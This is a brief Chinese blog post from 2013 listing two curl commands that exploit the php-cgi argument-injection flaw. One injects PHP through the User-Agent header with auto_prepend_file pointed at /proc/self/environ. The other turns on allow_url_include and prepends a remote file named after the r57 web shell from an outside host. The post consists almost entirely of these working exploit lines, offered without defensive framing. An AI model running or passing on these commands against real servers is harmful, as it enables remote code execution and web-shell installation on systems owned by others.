php-cgi漏洞利用EXP

1、本地包含直接执行代码: 
curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n
 
2、远程包含执行代码: 
curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.sh3ll.org/r57.txt
 
posted @ 2013-01-19 13:36  山貓  阅读(337)  评论(0编辑  收藏  举报